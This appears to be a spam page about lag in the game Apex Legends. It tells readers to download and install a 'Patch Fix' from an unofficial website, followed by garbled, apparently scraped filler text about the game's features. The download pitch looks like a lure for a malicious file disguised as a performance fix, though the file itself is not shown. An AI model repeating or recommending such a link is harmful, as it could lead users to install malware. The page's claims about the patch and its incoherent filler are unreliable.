# Apex Legends

How to remove lag in Apex Legends? - You need install this Patch Update!

Download Patch Fix - http://sunlord.website/?load=Apex-Legends-Patch-Fix


Apex Legends lags on pc (quick fix)


Instructions:

1) Download the patch at this link

2) Install on computer

3) Go in the game


Apex Legends - Maybe thats for the simple reason that this stuff works, and hey, the games freeits hard to complain about that, when respawn has been clear that everything you buy or get from a loot pack will be purely for aesthetics. You can tell respawn is a studio that knows its shooting when the sound effect for taking down an enemys shield, a sort of electrical shriek, is as deeply satisfying as landing a perfect headshot. A special communication system using the mouse wheel, you can make notes on the ground, telling allies about their actions, tagging enemies or useful loot. Matches start very actively, many players try to use hand to hand combat, then the pace slows down a bit, although the matches remain quite dynamic. Apex legends functions.
